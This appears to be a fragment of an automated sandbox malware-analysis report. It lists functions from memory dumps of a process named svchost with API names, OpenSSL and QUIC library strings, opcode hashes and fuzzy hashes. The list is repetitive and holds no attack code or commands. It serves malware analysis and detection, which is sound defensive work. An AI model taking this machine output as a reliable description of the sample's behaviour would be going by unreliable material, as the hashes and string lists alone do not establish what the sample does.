                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$Y_is_a$J_nid2sn$J_nid2lnR_vset_error
                                                                                              • String ID: ssl3_check_cert_and_algorithm$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 75950454-762223334
                                                                                              • Opcode ID: 6ec53f764d8173ae9a0e672e220565c7077c86d8d9e0f3c85db63dde2cc7d464
                                                                                              • Instruction ID: fcc35bf371722de01d18b17d5a1a06dd7340251b59e523444c9664e2bad5181e
                                                                                              • Opcode Fuzzy Hash: 6ec53f764d8173ae9a0e672e220565c7077c86d8d9e0f3c85db63dde2cc7d464
                                                                                              • Instruction Fuzzy Hash: 724195B1A0A68281F7A2DB75E4417FD2351EF84794F448031EE2D877B6DE6DE885C700
                                                                                              Function 00007FFBAB489C93 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_process_change_cipher_spec
                                                                                              • API String ID: 4275876640-357517272
                                                                                              • Opcode ID: d69fb330a46a4883bb35be0970d106fb875256030d65defc9c0906012a733fde
                                                                                              • Instruction ID: cfea5178e80d28ee8ed5b57bd2668639c5c96739aee864f8626637bb59dca264
                                                                                              • Opcode Fuzzy Hash: d69fb330a46a4883bb35be0970d106fb875256030d65defc9c0906012a733fde
                                                                                              • Instruction Fuzzy Hash: 49413BB2E0A24686FBA79B72D4927FD2350EF44744F448432CE2D43AA6DF6CE5C98710
                                                                                              Function 00007FFBAB4801A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_early_data
                                                                                              • API String ID: 193678381-3720901860
                                                                                              • Opcode ID: 5dc9a4f8d39dfe3ecc04f1a0088b0636e01fa56ef4e94fd03c5afca0973d748b
                                                                                              • Instruction ID: 3d00d90616d9a94c544906b64fd67e1231797656741711d458e0622385ea8d78
                                                                                              • Opcode Fuzzy Hash: 5dc9a4f8d39dfe3ecc04f1a0088b0636e01fa56ef4e94fd03c5afca0973d748b
                                                                                              • Instruction Fuzzy Hash: 1841A2A1A0A68282F7679BB5D4567FC27A0EB40740F44C432DE2D477F2DE6CA9C9C711
                                                                                              Function 00007FFBAB436B80 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Master-Key:$%02X$RSA $Session-ID:
                                                                                              • API String ID: 4098839300-1878088908
                                                                                              • Opcode ID: 7529bdf728e355d32a2083ee701bbcba0b9024adfbbcf3822a6ac71aeb3f0c81
                                                                                              • Instruction ID: 93933e8daf139994dcc2d63c813746fb4c3e1e8545303f1d42d83e605db40e69
                                                                                              • Opcode Fuzzy Hash: 7529bdf728e355d32a2083ee701bbcba0b9024adfbbcf3822a6ac71aeb3f0c81
                                                                                              • Instruction Fuzzy Hash: 9A311CA2A0EA5391FA669B36D9443B867A1EB44B80F4CD134DE3D836B5DF3CE4558304
                                                                                              Function 00007FFBAB42C410 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_pop$L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorT_free
                                                                                              • String ID: ct_move_scts$ssl\ssl_lib.c
                                                                                              • API String ID: 2898183876-1945711875
                                                                                              • Opcode ID: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                              • Instruction ID: 6ec712fff19149472f8c2f51f1d3466d6f17cb73e75044f810c546120dd50499
                                                                                              • Opcode Fuzzy Hash: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                              • Instruction Fuzzy Hash: 5421C0A1A4FB5241FA22EB32D49127E7295AF84B80F04C134EE6D83BB7DE3CE4058200
                                                                                              Function 00007FFBAB466A46 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Token: $<zero length token>$New token
                                                                                              • API String ID: 1322637139-1505068329
                                                                                              • Opcode ID: 4cc4649fcdbf46a72c7b1cf1d9b58eb439ba3a376af954ab7130259b364d0bec
                                                                                              • Instruction ID: ff39e477c7bc714d8989fc78a75aa88ae04f16e6eeb417ab4806210ace017adb
                                                                                              • Opcode Fuzzy Hash: 4cc4649fcdbf46a72c7b1cf1d9b58eb439ba3a376af954ab7130259b364d0bec
                                                                                              • Instruction Fuzzy Hash: 26114CD1E4AA4390FE26EBB5E8612FC1751AF45794F84D036DE2E572B6DE3CE44A8300
                                                                                              Function 00007FFBAB466AF8 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Fin)
                                                                                              • API String ID: 3964688267-4176003718
                                                                                              • Opcode ID: 6c1b773e76431031572140e2b9498ae3c8577f046698832ea47780813a54f7ea
                                                                                              • Instruction ID: f7a688e55b9c0a16b91a406513585d849cf2bb46aedb0b0c7d19f605ec1b9619
                                                                                              • Opcode Fuzzy Hash: 6c1b773e76431031572140e2b9498ae3c8577f046698832ea47780813a54f7ea
                                                                                              • Instruction Fuzzy Hash: A91152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B13 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off)
                                                                                              • API String ID: 3964688267-2743656729
                                                                                              • Opcode ID: d683bd9cf68c721bf02318fd61ad0a203fd3004a5d81cf29e164dbd4d0d02ef4
                                                                                              • Instruction ID: e88392307c0048c3556a14af168ade8f37bf8c7877acabd167746f282f7bedd2
                                                                                              • Opcode Fuzzy Hash: d683bd9cf68c721bf02318fd61ad0a203fd3004a5d81cf29e164dbd4d0d02ef4
                                                                                              • Instruction Fuzzy Hash: AA1152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B01 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Len)
                                                                                              • API String ID: 3964688267-4170081695
                                                                                              • Opcode ID: 36c5b77e84433ce9e4e8c1474984c7c447a533362a8d88f0135a06375218057e
                                                                                              • Instruction ID: 723dd4476fd6ac4bc5163a1b8b6201d3d4c488be6ca03ee8149484faeaa4d25a
                                                                                              • Opcode Fuzzy Hash: 36c5b77e84433ce9e4e8c1474984c7c447a533362a8d88f0135a06375218057e
                                                                                              • Instruction Fuzzy Hash: 9C1152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B0A Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Len, Fin)
                                                                                              • API String ID: 3964688267-755667354
                                                                                              • Opcode ID: dd470031f8fbef8c9c4dc14bbd52003ccb844931b9e1b30c8342e81f843339c0
                                                                                              • Instruction ID: f0d22de474692114d198669ff5ff07691d1e148e96963c730e0a28f9ff4fe02a
                                                                                              • Opcode Fuzzy Hash: dd470031f8fbef8c9c4dc14bbd52003ccb844931b9e1b30c8342e81f843339c0
                                                                                              • Instruction Fuzzy Hash: 681152E1E4A65380FE26DBB5D8613FC2760AF45788F549036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B1C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Fin)
                                                                                              • API String ID: 3964688267-743771625
                                                                                              • Opcode ID: 53ccaccf77185675b2e856e8cb6b3e6990cebd259b45082fefa23536fb91da59
                                                                                              • Instruction ID: 07cc9d894d1f728a8ab9e3470e92dc249a86adbdc5a92b4c8de3b645ebfcbde5
                                                                                              • Opcode Fuzzy Hash: 53ccaccf77185675b2e856e8cb6b3e6990cebd259b45082fefa23536fb91da59
                                                                                              • Instruction Fuzzy Hash: F61152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B25 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Len)
                                                                                              • API String ID: 3964688267-741583600
                                                                                              • Opcode ID: bf21fdf185826fa51263c15b4f18a555875111d825e4fd196e8d8daf15974131
                                                                                              • Instruction ID: a798f535dc22b7eee9667e25c3431cb69b4e3f5054ebcd3a1281fe4d2eef1e61
                                                                                              • Opcode Fuzzy Hash: bf21fdf185826fa51263c15b4f18a555875111d825e4fd196e8d8daf15974131
                                                                                              • Instruction Fuzzy Hash: 781152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              Function 00007FFBAB466B2E Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Len, Fin)
                                                                                              • API String ID: 3964688267-815063566
                                                                                              • Opcode ID: 91d637f4aae3752cebe6cbd6d38d90801f6dc67eabb4ba6ce6385815b6992a77
                                                                                              • Instruction ID: 39bcc6c9af4e08beb4c33458048eff7f970af80c1d77a1647dc717e1acdcfac1
                                                                                              • Opcode Fuzzy Hash: 91d637f4aae3752cebe6cbd6d38d90801f6dc67eabb4ba6ce6385815b6992a77
                                                                                              • Instruction Fuzzy Hash: 6B1152E1E4A65390FE26DBB1D8513FC2760AF45798F449036DE2D176B6DE3CE4868300
                                                                                              Function 00007FFBAB466944 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ App Protocol Error Code: %llu$ Final size: %llu$ Stream id: %llu$Reset stream
                                                                                              • API String ID: 3508759399-1770620147
                                                                                              • Opcode ID: 70d345d178550aaad9d0c406ae69edbd367613dc75700494bee0849a220fe693
                                                                                              • Instruction ID: 17239f462b88996550306df908baea89b0d5e845e0d8ef7ac46ab704c629c1d9
                                                                                              • Opcode Fuzzy Hash: 70d345d178550aaad9d0c406ae69edbd367613dc75700494bee0849a220fe693
                                                                                              • Instruction Fuzzy Hash: C9012DE1E4A75390FE26EB75E9612FD1760AF45794F449036DE2E076A6DE3CE0868300
                                                                                              Function 64945BE0 Relevance: 16.7, APIs: 11, Instructions: 151sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateEvent
                                                                                              • String ID:
                                                                                              • API String ID: 1576368186-0
                                                                                              • Opcode ID: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                                                                                              • Instruction ID: 322aad4d60bda52f91d0dd0aacbc613f080a5a7f86a1d1e06db62ca80e90a9de
                                                                                              • Opcode Fuzzy Hash: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                                                                                              • Instruction Fuzzy Hash: 2C519A3229165086EB158F75E80475E33A9FB89BBCF244325DE298B7D8DF39C886C350
                                                                                              Function 00007FFBAB4407D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_indent
                                                                                              • String ID: No extensions$extensions, extype = %d, extlen = %d$extensions, length = %d
                                                                                              • API String ID: 3358443131-3081145182
                                                                                              • Opcode ID: 95592bc04ea74deb72a3172617bde5129a03d8bd8dee081b65f7ef57a1859369
                                                                                              • Instruction ID: 63c20651bf4ae177cbf18360c30728bd87f7427cb4b3f7aafdfb02c119166610
                                                                                              • Opcode Fuzzy Hash: 95592bc04ea74deb72a3172617bde5129a03d8bd8dee081b65f7ef57a1859369
                                                                                              • Instruction Fuzzy Hash: 744112B3A1A29246EB22CB31E8001697BA4FB85794F08C131EEEC03B65EF3CD465C700
                                                                                              Function 00007FFBAB4167E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_writeR_vset_error
                                                                                              • String ID: ssl3_finish_mac$ssl\s3_enc.c
                                                                                              • API String ID: 4154431231-3730779252
                                                                                              • Opcode ID: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                              • Instruction ID: 9aaac6491fb0b4822c312c30ddf0ebaaf251c521452b868c5c3ead913424e55a
                                                                                              • Opcode Fuzzy Hash: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                              • Instruction Fuzzy Hash: 4F2183A1F1E14241FBA2E772F9926FD1350AF84780F448536EE3D876B2EE6CE5858701
                                                                                              Function 00007FFBAB42AAF0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$O_new
                                                                                              • String ID: SSL_set_fd$ssl\ssl_lib.c
                                                                                              • API String ID: 1854182563-2027645073
                                                                                              • Opcode ID: f9c72873d159070fe3c3de754aa628ec22fe2a5cd73b99806cc2c20f871fd2a2
